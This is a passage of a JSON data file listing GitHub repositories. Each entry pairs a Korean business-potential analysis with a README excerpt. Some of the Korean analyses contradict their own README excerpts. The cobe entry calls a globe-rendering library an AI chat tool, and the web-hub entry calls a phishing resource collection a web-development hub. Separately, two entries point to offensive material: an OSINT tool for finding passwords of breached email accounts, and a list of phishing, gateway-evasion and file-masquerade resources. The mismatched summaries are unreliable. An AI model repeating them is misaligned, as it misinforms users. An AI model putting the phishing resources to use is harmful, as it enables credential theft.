[here](https://github.com/dmytrodanylyk/android-morphing-button).\n\n[![](https://jitpack.io/v/dmytrodanylyk/circular-progress-button.svg)](https://jitpack.io/#dmytrodanylyk/circular-progress-button)\n[![Android Arsenal](http://img.shields.io/badge/Android%20Arsenal-Circular%20Progress%20Button-brightgreen.png?style=flat)](http://android-arsenal.com/details/1/67)\n\n### Description\n\nAndroid Button which can morph to Circular Progress\n\n![](screenshots/intro.gif)\n\n### Wiki\n\n- [Home]\n- [Screenshots]\n- [User Guide]\n\n### Integration\n\nThe lib is available on Maven Central, you can find it with [Gradle, please]\n\n```\nallprojects {\n   repositories {\n      ...\n      maven { url 'https://jitpack.io' }\n   }\n}\n```\n\n```\ndependencies {\n    implementation 'com.github.dmytrodanylyk:circular-progress-button:$latest'\n}\n```\n\n### ProGuard\n\nIf you are using proguard with your project, add following code to your proguard config file\n\n```\n-keepclassmember","composite_score":0.0488,"license_safety_tag":"safe"},{"name":"rustwasm/wasm-bindgen","github_url":"https://github.com/rustwasm/wasm-bindgen","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# wasm-bindgen 비즈니스 분석\n\n## 왜 보물인가\n웹 브라우저에서 빠르고 효율적으로 작동하는 프로그램을 만들 수 있게 해주는 핵심 도구로, 웹 애플리케이션의 성능을 획기적으로 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 복잡한 계산이 필요한 데이터 분석 대시보드, 이미지/비디오 편집 웹 애플리케이션\n- **내부 ","readme_excerpt":"<div align=\"center\">\n\n  <h1><code>wasm-bindgen</code></h1>\n\n  <p>\n    <strong>Facilitating high-level interactions between Wasm modules and JavaScript.</strong>\n  </p>\n\n  <p>\n    <a href=\"https://github.com/wasm-bindgen/wasm-bindgen/actions/workflows/main.yml?query=branch%3Amain\"><img src=\"https://github.com/wasm-bindgen/wasm-bindgen/actions/workflows/main.yml/badge.svg?branch=main\" alt=\"Build Status\" /></a>\n    <a href=\"https://crates.io/crates/wasm-bindgen\"><img src=\"https://img.shields.io/crates/v/wasm-bindgen.svg?style=flat-square\" alt=\"Crates.io version\" /></a>\n    <a href=\"https://crates.io/crates/wasm-bindgen\"><img src=\"https://img.shields.io/crates/d/wasm-bindgen.svg?style=flat-square\" alt=\"Download\" /></a>\n    <a href=\"https://docs.rs/wasm-bindgen\"><img src=\"https://img.shields.io/badge/docs-latest-blue.svg?style=flat-square\" alt=\"docs.rs docs\" /></a>\n  </p>\n\n  <h3>\n    <a href=\"https://wasm-bindgen.github.io/wasm-bindgen/\">Guide (main branch)</a>\n    <span> | </span>\n    <a h","composite_score":0.0486,"license_safety_tag":"safe"},{"name":"thewhiteh4t/pwnedOrNot","github_url":"https://github.com/thewhiteh4t/pwnedOrNot","stars":10,"language":"Python","license":"MIT","abandonment_months":2,"description":"# pwnedOrNot 평가 분석\n\n## 왜 보물인가\n당신이 사용하는 비밀번호가 해킹 데이터베이스에 유출되었는지 간단히 확인할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 직원들의 계정 보안을 일괄 점검하는 웹 서비스로 운영\n2. **내부 업무 도구**: HR팀이 직원 온보딩 시 보안 교육과 함께 사용하는 체크리스트","readme_excerpt":"<p align=\"center\"><img src=\"https://i.imgur.com/ojjMbWX.jpg\"></p>\r\n\r\n<h4 align=\"center\">OSINT Tool for Finding Passwords of Compromised Email Accounts</h4>\r\n\r\n<p align=\"center\">\r\n  Created by Lohitya Pushkar (thewhiteh4t).<br>\r\n  <a href=\"https://x.com/thewhiteh4t\"><b>Twitter</b></a>\r\n  <span> - </span>\r\n  <a href=\"https://thewhiteh4t.github.io\"><b>Blog</b></a>\r\n</p>\r\n\r\n| Available                                 | in                                   |                                                   |\r\n| ----------------------------------------- | ------------------------------------ | ------------------------------------------------- |\r\n| [BlackArch Linux](https://blackarch.org/) | [SecBSD](https://secbsd.org/)        | [Tsurugi Linux](https://tsurugi-linux.org/)       |\r\n| ![](https://i.imgur.com/1wJVDV5.png)      | ![](https://i.imgur.com/z36xL8c.png) | ![Tsurugi Linux](https://i.imgur.com/S1ylcp7.jpg) |\r\n\r\n---\r\n\r\npwnedOrNot works in two phases. In the **first** phase it tests th","composite_score":0.0484,"license_safety_tag":"safe"},{"name":"fossasia/flappy-svg","github_url":"https://github.com/fossasia/flappy-svg","stars":9,"language":"JavaScript","license":"NOASSERTION","abandonment_months":4,"description":"# flappy-svg 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 바로 사용할 수 있는 간단한 게임 개발 도구로, 프로그래밍 지식 없이도 인터랙티브한 콘텐츠를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 교육용 게임 제작 플랫폼으로 학생들이 쉽게 게임을 만들고 공유하는 온라인 서비스\n2. **내부 업무 도구**: 마케팅","readme_excerpt":"Flappy SVG\n==========\n\nThis branch contains the core functionality of the game. Here you can program the game and change it.\n\n[See the master branch](../../tree/master#flappy-svg) if you like to know more, contribute and see who created the game.\n\n","composite_score":0.0484,"license_safety_tag":"unknown"},{"name":"imdario/mergo","github_url":"https://github.com/imdario/mergo","stars":6,"language":"Go","license":"bsd-3-clause","abandonment_months":2,"description":"# imdario/mergo 분석 보고서\n\n## 왜 보물인가\n서로 다른 데이터 묶음을 자동으로 합쳐주는 기술로, 프로그래머들이 반복적인 작업을 줄일 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **설정 관리 SaaS**: 여러 클라우드 환경의 설정값을 한 곳에서 통합 관리하는 서비스\n2. **데이터 통합 API**: 고객사의 여러 데이터베이스 정보","readme_excerpt":"# Mergo\n\n[![GitHub release][5]][6]\n[![GoCard][7]][8]\n[![Test status][1]][2]\n[![OpenSSF Scorecard][21]][22]\n[![OpenSSF Best Practices][19]][20]\n[![Coverage status][9]][10]\n[![Sourcegraph][11]][12]\n[![FOSSA status][13]][14]\n\n[![GoDoc][3]][4]\n[![Become my sponsor][15]][16]\n[![Tidelift][17]][18]\n[![Liberapay patrons][23]][24]\n\n[![Support mergo on drips.network][25]][26]\n[![Build with Ona][27]][28]\n\n[1]: https://github.com/darccio/mergo/workflows/tests/badge.svg?branch=master\n[2]: https://github.com/darccio/mergo/actions/workflows/tests.yml\n[3]: https://pkg.go.dev/badge/dario.cat/mergo\n[4]: https://pkg.go.dev/dario.cat/mergo\n[5]: https://img.shields.io/github/release/darccio/mergo.svg\n[6]: https://github.com/darccio/mergo/releases\n[7]: https://goreportcard.com/badge/dario.cat/mergo\n[8]: https://goreportcard.com/report/dario.cat/mergo\n[9]: https://coveralls.io/repos/github/darccio/mergo/badge.svg?branch=master\n[10]: https://coveralls.io/github/darccio/mergo?branch=master\n[11]: https://source","composite_score":0.0484,"license_safety_tag":"safe"},{"name":"willmcgugan/textual","github_url":"https://github.com/willmcgugan/textual","stars":7,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Textual 저장소 분석\n\n## 왜 보물인가\n터미널(검은색 화면) 환경에서도 마치 스마트폰 앱처럼 아름답고 사용하기 쉬운 프로그램을 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 데이터 분석 도구의 터미널 인터페이스 제공으로 복잡한 설치 없이 웹에서 바로 사용 가능하게 함\n2. **내부 업무 도구**","readme_excerpt":"\n\n[![Discord](https://img.shields.io/discord/1026214085173461072)](https://discord.gg/Enf6Z3qhVr)\n[![Supported Python Versions](https://img.shields.io/pypi/pyversions/textual)](https://pypi.org/project/textual/)\n[![PyPI version](https://badge.fury.io/py/textual.svg?)](https://badge.fury.io/py/textual)\n![OS support](https://img.shields.io/badge/OS-macOS%20Linux%20Windows-red)\n\n\n\n![textual-splash](https://github.com/user-attachments/assets/4caeb77e-48c0-4cf7-b14d-c53ded855ffd)\n\n# Textual\n\n<img align=\"right\" width=\"250\" alt=\"clock\" src=\"https://github.com/user-attachments/assets/63e839c3-5b8e-478d-b78e-cf7647eb85e8\" />\n\nBuild cross-platform user interfaces with a simple Python API. Run your apps in the terminal *or* a web browser.\n\nTextual's API combines modern Python with the best of developments from the web world, for a lean app development experience.\nDe-coupled components and an advanced [testing](https://textual.textualize.io/guide/testing/) framework ensure you can maintain your ap","composite_score":0.0481,"license_safety_tag":"safe"},{"name":"gaearon/redux-devtools","github_url":"https://github.com/gaearon/redux-devtools","stars":6,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Redux DevTools 수익화 분석\n\n## 왜 보물인가\n웹 애플리케이션 개발자들이 앱의 상태 변화를 시간 여행하듯 돌려보며 버그를 찾을 수 있는 강력한 디버깅 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 개발자용 클라우드 IDE에 통합하여 실시간 앱 상태 분석 기능 제공\n2. **내부 업무 도구**: 웹 기반 데이터 대","readme_excerpt":"![GitHub Workflow Status](https://img.shields.io/github/workflow/status/reduxjs/redux-devtools/CI)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=round-square)](https://github.com/reduxjs/redux-devtools/pulls)\n[![OpenCollective](https://opencollective.com/redux-devtools-extension/backers/badge.svg)](#backers)\n[![OpenCollective](https://opencollective.com/redux-devtools-extension/sponsors/badge.svg)](#sponsors)\n\n# Redux DevTools\n\nDeveloper Tools to power-up [Redux](https://redux.js.org/) development workflow or any other architecture which handles the state change (see [integrations](https://github.com/reduxjs/redux-devtools/blob/main/extension/docs/Integrations.md)).\n\nIt can be used as a browser extension (for [Chrome](https://chrome.google.com/webstore/detail/redux-devtools/lmhkpmbekcpmknklioeibfkpmmfibljd), [Edge](https://microsoftedge.microsoft.com/addons/detail/redux-devtools/nnkgneoiohoecpdiaponcejilbhhikei) and [Firefox](https://addons.mozilla.org/","composite_score":0.0479,"license_safety_tag":"safe"},{"name":"umijs/dumi","github_url":"https://github.com/umijs/dumi","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# umijs/dumi 프로젝트 분석\n\n## 왜 보물인가\n회사나 팀에서 만든 소프트웨어 도구들을 쉽게 설명하고 공유할 수 있는 문서 작성 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: API 문서 자동 생성 및 관리 서비스로 소프트웨어 개발 회사들에게 판매\n2. **내부 업무 도구**: 대기업의 개발팀이 자체 도구와 라이브러리 사용","readme_excerpt":"# dumi\n\n[![NPM version](https://img.shields.io/npm/v/dumi)](https://npmjs.org/package/dumi) [![NPM downloads](https://img.shields.io/npm/dm/dumi)](https://npmjs.org/package/dumi) [![GitHub CI](https://github.com/umijs/dumi/workflows/CI/badge.svg)](https://github.com/umijs/dumi)\n\n<img src=\"https://gw.alipayobjects.com/zos/bmw-prod/d3e3eb39-1cd7-4aa5-827c-877deced6b7e/lalxt4g3_w256_h256.png\" width=\"120\">\n\ndumi is a static site generator for component library development.\n\n## Usage & Guide\n\nTo view more online examples and docs, please visit [dumi official site](https://d.umijs.org).\n\n## Contributing\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md)\n\n<a href=\"https://openomy.app/github/umijs/dumi\" target=\"_blank\" style=\"display: block; width: 100%;\" align=\"center\">\n  <img src=\"https://www.openomy.app/svg?repo=umijs/dumi&chart=bubble&latestMonth=3\" target=\"_blank\" alt=\"Contribution Leaderboard\" style=\"display: block; width: 100%;\" />\n</a>\n\n## Badge\n\nUsing dumi? Add a README badge to show it off: [![","composite_score":0.0478,"license_safety_tag":"safe"},{"name":"piotrwitek/react-redux-typescript-guide","github_url":"https://github.com/piotrwitek/react-redux-typescript-guide","stars":7,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# React-Redux TypeScript 가이드 분석\n\n## 왜 보물인가\n복잡한 웹 애플리케이션을 안정적으로 만드는 방법을 체계적으로 정리한 실용적인 참고서입니다.\n\n## 어디에 쓸 수 있나\n- **대시보드 SaaS**: 실시간 데이터를 안정적으로 관리해야 하는 분석 도구\n- **팀 협업 도구**: 여러 사용자의 동시 작업을 안전하게 처리하는 프로젝트 ","readme_excerpt":"<div align=\"center\">\n\n# React & Redux in TypeScript - Complete Guide\n\n_\"This guide is a **living compendium** documenting the most important patterns and recipes on how to use **React** (and its Ecosystem) in a **functional style** using **TypeScript**. It will help you make your code **completely type-safe** while focusing on **inferring the types from implementation** so there is less noise coming from excessive type annotations and it's easier to write and maintain correct types in the long run.\"_\n\n[![Join the community on Spectrum](https://withspectrum.github.io/badge/badge.svg)](https://spectrum.chat/react-redux-ts)\n[![Join the chat at https://gitter.im/react-redux-typescript-guide/Lobby](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/react-redux-typescript-guide/Lobby)\n\n_Found it useful? Want more updates?_\n\n[**Show your support by giving a :star:**](https://github.com/piotrwitek/react-redux-typescript-guide/stargazers)\n\n<a href=\"https://www.buymeacoffee.com/piotrek","composite_score":0.0477,"license_safety_tag":"safe"},{"name":"teamtnt/tntsearch","github_url":"https://github.com/teamtnt/tntsearch","stars":5,"language":"PHP","license":"mit","abandonment_months":2,"description":"# TNTSearch 사업화 분석\n\n## 왜 보물인가\n웹사이트나 앱 내에서 사용자가 원하는 정보를 빠르게 찾을 수 있는 '검색 기능'을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 문서 관리 플랫폼(노션 같은 서비스)에 강력한 검색 기능을 제공하는 부가 서비스\n- **내부 업무 도구**: 회사 직원들이 방대","readme_excerpt":"[![Latest Version on Packagist][ico-version]][link-packagist]\n[![Total Downloads][ico-downloads]][link-downloads]\n[![Software License][ico-license]](LICENSE.md)\n[![Build Status](https://img.shields.io/travis/teamtnt/tntsearch/master.svg?style=flat-square)](https://travis-ci.org/teamtnt/tntsearch)\n[![Slack Status](https://img.shields.io/badge/slack-chat-E01563.svg?style=flat-square)](https://tntsearch.slack.com)\n\n![TNTSearch](https://i.imgur.com/aYKsNYv.png)\n\n# TNTSearch\n\nTNTSearch is a full-text search (FTS) engine written entirely in PHP. A simple configuration allows you to add an amazing search experience in just minutes. Features include:\n\n* Fuzzy search\n* Search as you type\n* Geo-search\n* Text classification\n* Stemming\n* Custom tokenizers\n* Bm25 ranking algorithm\n* Boolean search\n* Result highlighting\n* Dynamic index updates (no need to reindex each time)\n* Easily deployable via Packagist.org\n\nWe also created some demo pages that show tolerant retrieval with n-grams in action.\nThe","composite_score":0.0475,"license_safety_tag":"safe"},{"name":"shuding/cobe","github_url":"https://github.com/shuding/cobe","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# shuding/cobe 프로젝트 분석\n\n## 왜 보물인가\n웹사이트에 방문자와 실시간으로 대화할 수 있는 AI 채팅 기능을 간단히 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 지원팀이 사용할 수 있는 AI 채팅 상담사 플랫폼으로 제공\n- **내부 업무 도구**: 회사 내부 웹사이트에 직원 질문 답변용 AI 챗봇","readme_excerpt":"[![COBE](card.png)](https://cobe.vercel.app)\n\n<p align=\"center\">Use any DOM element as bindable markers.<br/>CSS transitions, animations, filters, interactivity, all just work.</p>\n\n<p align=\"center\">High perf, zero deps, ~5KB.</p>\n\n<p align=\"center\">\n  <video src=\"ideas-1_4x.mp4\" poster=\"card.png\" autoplay loop muted playsinline width=\"600\"></video>\n</p>\n\n---\n\n- [**Demo** and configurations](https://cobe.vercel.app)\n\n## Quick Start\n\n```html\n<canvas\n  id=\"cobe\"\n  style=\"width: 500px; height: 500px;\"\n  width=\"1000\"\n  height=\"1000\"\n></canvas>\n```\n\n```js\nimport createGlobe from 'cobe'\n\nlet phi = 0\nlet canvas = document.getElementById(\"cobe\")\n\nconst globe = createGlobe(canvas, {\n  devicePixelRatio: 2,\n  width: 1000,\n  height: 1000,\n  phi: 0,\n  theta: 0,\n  dark: 0,\n  diffuse: 1.2,\n  scale: 1,\n  mapSamples: 16000,\n  mapBrightness: 6,\n  baseColor: [0.3, 0.3, 0.3],\n  markerColor: [1, 0.5, 1],\n  glowColor: [1, 1, 1],\n  offset: [0, 0],\n  markers: [\n    { location: [37.7595, -122.4367], size: 0.0","composite_score":0.0475,"license_safety_tag":"safe"},{"name":"ybdt/web-hub","github_url":"https://github.com/ybdt/web-hub","stars":10,"language":"","license":"unknown","abandonment_months":2,"description":"# ybdt/web-hub 저장소 분석\n\n## 왜 보물인가\n웹 개발에 필요한 다양한 도구와 자료들을 한곳에 모아둔 허브로, 개발자들이 반복적인 작업을 줄일 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 학습 플랫폼**: 초보자부터 전문가까지 필요한 코드 샘플과 튜토리얼을 구독 형태로 제공하는 서비스\n2. **개발팀 내부 도구**: 회사의 ","readme_excerpt":"The current project contains every social fishing point.\n\nEvery subdirectory contains the recommended article and project, and partial implemented code.\n\nThe code in subdirectory has been tested compile successfully and function properly.\n\n### 01-Information-Gather\n### 02-Gateway-Evasion-and-File-Masquerade\n### 03-Click-Masquerade\n\n\n# 案例学习\n```\nhttps://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/\n【红蓝对抗：钓鱼演练资源汇总&备忘录】https://github.com/tib36/PhishingBook\n【实战｜记一次企业钓鱼演练】https://mp.weixin.qq.com/s/4ilYuK7jbg5xfU2l3x1Sbw\n【记一次钓鱼邮件演练】https://mp.weixin.qq.com/s/R5zvtEKvxQdXLpP4tI9opQ\n【邮件钓鱼新思路】https://mp.weixin.qq.com/s/a4nqyKPzACYbsJAIqDrgow\n【干货 | 红队渗透中钓鱼tips总结】https://mp.weixin.qq.com/s/RDvakryfe_5oQ656AVIJsA\n【钓鱼邮件（上）】https://mp.weixin.qq.com/s/YR6DFvDAP_gn96K3zaQtAQ\nhttps://mp.weixin.qq.com/s/-sGRCSoOxP2a9aR0vNoZVw\nhttps://www.cybereason.com/blog/threat-analysis-taking-shortcuts-using-lnk-files-for-initial-infection-and-persistence\nh","composite_score":0.0473,"license_safety_tag":"unknown"},{"name":"syoyo/tinyobjloader","github_url":"https://github.com/syoyo/tinyobjloader","stars":5,"language":"C++","license":"mit","abandonment_months":2,"description":"# tinyobjloader 분석\n\n## 왜 보물인가\n3D 그래픽 파일을 읽어주는 가볍고 믿을 수 있는 도구로, 게임이나 3D 디자인 소프트웨어를 만드는 개발자들이 반복적으로 찾는 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 3D 모델 뷰어 플랫폼에서 사용자가 업로드한 3D 파일을 자동 변환·표시\n- **내부 업무 도구","readme_excerpt":"# tinyobjloader\n\n[![PyPI version](https://badge.fury.io/py/tinyobjloader.svg)](https://badge.fury.io/py/tinyobjloader)\n\nTiny but powerful single file wavefront obj loader written in C++11. No dependency except for C++ STL. It can parse over 10M polygons with moderate memory and time.\n\n`tinyobjloader` is good for embedding .obj loader to your (global illumination) renderer ;-)\n\nIf you are looking for C99 version, please see https://github.com/syoyo/tinyobjloader-c .\n\nVersion notice\n--------------\n\nWe recommend using the `release` (main) branch. It contains the v2.0 release candidate. Most features are now nearly robust and stable. (The remaining task for release v2.0 is polishing C++ and Python API, and fix built-in triangulation code).\n\nWe have released new version v1.0.0 on 20 Aug, 2016.\nOld version is available as `v0.9.x` branch https://github.com/syoyo/tinyobjloader/tree/v0.9.x\n\n## What's new\n\n* 29 Jul, 2021 : Added Mapbox's earcut for robust triangulation. Also fixes triangulation","composite_score":0.0473,"license_safety_tag":"safe"},{"name":"MultiMC/MultiMC5","github_url":"https://github.com/MultiMC/MultiMC5","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":1,"description":"# MultiMC5 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임을 쉽게 설치하고 여러 버전을 관리할 수 있는 도구로, 게임 애호가들 사이에서 필수 프로그램입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 런처 SaaS**: 마인크래프트 모드/버전 관리를 클라우드로 제공하는 구독 서비스\n2. **게임 카페 관리 도구**: PC방이나 게임 센터에서 여러 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://avatars2.githubusercontent.com/u/5411890\" alt=\"MultiMC logo\"/>\n</p>\n\nMultiMC\n=======\n\nMultiMC is a custom launcher for Minecraft that focuses on predictability, long term stability and simplicity.\n\n## Development\nIf you want to contribute, talk to us on [Discord](https://discord.gg/multimc) first.\n\nWhile blindly submitting PRs is definitely possible, they're not necessarily going to get accepted.\n\nWe aren't looking for flashy features, but expanding upon the existing feature set without disruption or endangering the future viability of the project is OK.\n\n### Building\nIf you want to build the launcher yourself, check [BUILD.md](BUILD.md) for build instructions.\n\n### Code formatting\nJust follow the existing formatting.\n\nIn general, in order of importance:\n* Make sure your IDE is not messing up line endings or whitespace and avoid using linters.\n* Prefer readability over dogma.\n* Keep to the existing formatting.\n* Indent with 4 space unless it's in ","composite_score":0.0473,"license_safety_tag":"unknown"},{"name":"supertuxkart/stk-code","github_url":"https://github.com/supertuxkart/stk-code","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# SuperTuxKart (stk-code) 상용화 분석\n\n## 왜 보물인가\n누구나 즐길 수 있는 무료 레이싱 게임 엔진으로, 게임사나 교육 기관이 자신의 게임을 만들기 위한 기반으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 브라우저에서 직접 플레이할 수 있는 온라인 레이싱 게임 플랫폼 (게임 제작 코드 공개 없음)\n","readme_excerpt":"# SuperTuxKart\n[![Linux build status](https://github.com/supertuxkart/stk-code/actions/workflows/linux.yml/badge.svg)](https://github.com/supertuxkart/stk-code/actions/workflows/linux.yml)\n[![Apple build status](https://github.com/supertuxkart/stk-code/actions/workflows/apple.yml/badge.svg)](https://github.com/supertuxkart/stk-code/actions/workflows/apple.yml)\n[![Windows build status](https://github.com/supertuxkart/stk-code/actions/workflows/windows.yml/badge.svg)](https://github.com/supertuxkart/stk-code/actions/workflows/windows.yml)\n[![Switch build status](https://github.com/supertuxkart/stk-code/actions/workflows/switch.yml/badge.svg)](https://github.com/supertuxkart/stk-code/actions/workflows/switch.yml)\n[![#supertuxkart on the libera IRC network](https://img.shields.io/badge/libera-%23supertuxkart-brightgreen.svg)](https://web.libera.chat/?channels=#supertuxkart)\n\nSuperTuxKart is a free kart racing game. It focuses on fun and not on realistic kart physics. Instructions can be fo","composite_score":0.0471,"license_safety_tag":"unknown"},{"name":"kubernetes-incubator/cri-o","github_url":"https://github.com/kubernetes-incubator/cri-o","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# CRI-O 저장소 분석\n\n## 왜 보물인가\n컨테이너(배송 박스처럼 소프트웨어를 담는 기술)를 효율적으로 관리하는 핵심 엔진으로, 쿠버네티스(대규모 서버 관리 플랫폼)에서 매우 중요한 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 서비스 제공업체**: AWS, Google Cloud 같은 회사들이 고객에게 안정적인 컨테이너 실행 환경을 제공","readme_excerpt":"<!-- markdownlint-disable-next-line MD041 -->\n\n![CRI-O logo](https://github.com/cri-o/cri-o/blob/main/logo/crio-logo.svg?raw=true)\n\n# CRI-O - OCI-based implementation of Kubernetes Container Runtime Interface\n\n<!-- markdownlint-disable-next-line MD042 -->\n\n[![Stable Status](https://img.shields.io/badge/status-stable-brightgreen.svg)](#)\n[![codecov](https://codecov.io/gh/cri-o/cri-o/branch/main/graph/badge.svg)](https://codecov.io/gh/cri-o/cri-o)\n[![Packages](https://img.shields.io/badge/deb%2frpm-packages-blue.svg)](https://github.com/cri-o/packaging)\n[![Release Notes](https://img.shields.io/badge/release-notes-blue.svg)](https://cri-o.github.io/cri-o)\n[![Dependencies](https://img.shields.io/badge/report-dependencies-blue.svg)](https://cri-o.github.io/cri-o/dependencies)\n[![GoDoc](https://godoc.org/github.com/cri-o/cri-o?status.svg)](https://godoc.org/github.com/cri-o/cri-o)\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/cri-o/cri-o/badge)](https://scoreca","composite_score":0.0471,"license_safety_tag":"safe"},{"name":"conventional-changelog/standard-version","github_url":"https://github.com/conventional-changelog/standard-version","stars":6,"language":"JavaScript","license":"isc","abandonment_months":1,"description":"# standard-version 상업화 분석\n\n## 왜 보물인가\n소프트웨어 개발팀이 수동으로 하던 버전 관리와 릴리스 노트 작성을 자동화해주는 도구로, 반복 작업을 줄여 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발 도구 SaaS 플랫폼**\n깃허브/깃랩 같은 코드 저장소 서비스에 자동 버전 관리 기능을 추가 서비스로 판","readme_excerpt":"# Standard Version\n\n> **`standard-version` is deprecated**. If you're a GitHub user, I recommend [release-please](https://github.com/googleapis/release-please) as an alternative. If you're unable to use GitHub Actions, or if you need to stick with `standard-version` for some other reason, you can use the [commit-and-tag-version]( https://github.com/absolute-version/commit-and-tag-version) fork of `standard-version`.\n\nA utility for versioning using [semver](https://semver.org/) and CHANGELOG generation powered by [Conventional Commits](https://conventionalcommits.org).\n\n![ci](https://github.com/conventional-changelog/standard-version/workflows/ci/badge.svg)\n[![NPM version](https://img.shields.io/npm/v/standard-version.svg)](https://www.npmjs.com/package/standard-version)\n[![codecov](https://codecov.io/gh/conventional-changelog/standard-version/branch/master/graph/badge.svg?token=J7zMN7vTTd)](https://codecov.io/gh/conventional-changelog/standard-version)\n[![Conventional Commits](https://","composite_score":0.0465,"license_safety_tag":"safe"},{"name":"WayLearnLatam/Learning-Rust","github_url":"https://github.com/WayLearnLatam/Learning-Rust","stars":43,"language":"Rust","license":"NOASSERTION","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.0465,"license_safety_tag":"unknown"},{"name":"dkogan/vnlog","github_url":"https://github.com/dkogan/vnlog","stars":8,"language":"Perl","license":"unknown","abandonment_months":4,"description":"# vnlog 저장소 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 표로 정리하고 분석하는 작업을 자동화해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 플랫폼에서 사용자가 업로드한 파일을 자동으로 정리하고 검증하는 기능 제공\n- **내부 업무 도구**: 기업의 보고서나 통계 데이터를 빠르게 처리하는 백엔드 ","readme_excerpt":"* Talk\n\nI just gave a talk about this at [[https://www.socallinuxexpo.org/scale/17x][SCaLE 17x]]. Here are the [[https://www.youtube.com/watch?v=Qvb_uNkFGNQ&t=12830s][video of the talk]] and\nthe [[https://github.com/dkogan/talk-feedgnuplot-vnlog/blob/master/feedgnuplot-vnlog.org][\"slides\"]].\n\n* Summary\n\nVnlog (\"vanilla-log\") is a toolkit for manipulating tabular ASCII data with\nlabelled fields using normal UNIX tools. If you regularly use =awk= and =sort=\nand =uniq= and others, these tools will make you infinitely more powerful. The\nvnlog tools /extend/, rather than replace the standard tooling, so minimal\neffort is required to learn and use these tools.\n\nEverything assumes a trivially simple log format:\n\n- A whitespace-separated table of ASCII human-readable text\n- A =#= character starts a comment that runs to the end of the line (like in\n  many scripting languages)\n- The first line that begins with a single =#= (not =##= or =#!=) is a /legend/,\n  naming each column. This is required,","composite_score":0.0465,"license_safety_tag":"unknown"},{"name":"Peltoche/lsd","github_url":"https://github.com/Peltoche/lsd","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":2,"description":"# Peltoche/lsd 분석 보고서\n\n## 왜 보물인가\n폴더와 파일을 보기 좋게 정렬해서 보여주는 도구로, 컴퓨터 초보자도 파일 관리를 더 쉽게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 서비스**: 구글 드라이브나 원드라이브처럼 파일을 예쁘게 표시하는 기능으로 차별화\n2. **회사 문서 관리 시스템**: 직원들이 수백 개의 ","readme_excerpt":"<div align=\"center\">\n   <sup>Special thanks to:</sup>\n   <br>\n   <sup>Maintained with ❤️ + 🤖 by Pochi</sup>\n   <br>\n   <br>\n   <a href=\"https://app.getpochi.com\">\n      <img alt=\"Pochi AI Coding Assistant\" width=\"160\" src=\"https://github.com/TabbyML/pochi/blob/main/packages/vscode/assets/icons/logo128.png?raw=true\">\n   </a>\n\n### [Pochi is an AI agent designed for software development.](https://app.getpochi.com)\n[It operates within your IDE, using a toolkit of commands to write and refactor code autonomously across your entire project.](https://app.getpochi.com)<br>\n\n</div>\n\n---\n\n> [!IMPORTANT]\n> This is the documentation for the development version of lsd.\n> Please consult the documentation on [the Tags page](https://github.com/lsd-rs/lsd/tags) if you are looking for the documentation of individual releases.\n>\n> The current newest release is: [v1.2.0](https://github.com/lsd-rs/lsd/tree/v1.2.0)\n\n# LSD (LSDeluxe)\n[![license](http://img.shields.io/badge/license-Apache%20v2-blue.svg)](http","composite_score":0.0462,"license_safety_tag":"safe"},{"name":"ConsenSys/mythril","github_url":"https://github.com/ConsenSys/mythril","stars":5,"language":"Python","license":"MIT","abandonment_months":1,"description":"# Mythril 저장소 분석\n\n## 왜 보물인가\n블록체인 기반 스마트 계약의 보안 문제를 자동으로 찾아주는 도구로, 암호화폐 거래소와 블록체인 기업들에게 필수적인 검증 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자들이 코드를 업로드하면 자동으로 보안 취약점을 분석해주는 웹 플랫폼\n2. **내부 업무 도구**: 암호화폐 거래","readme_excerpt":"# Mythril\n\n<p align=\"center\">\n\t<img src=\"/static/mythril_new.png\" height=\"320px\"/>\n</p>\n\n[![Discord](https://img.shields.io/discord/697535391594446898)](https://discord.com/invite/consensys)\n[![PyPI](https://badge.fury.io/py/mythril.svg)](https://pypi.python.org/pypi/mythril)\n[![Read the 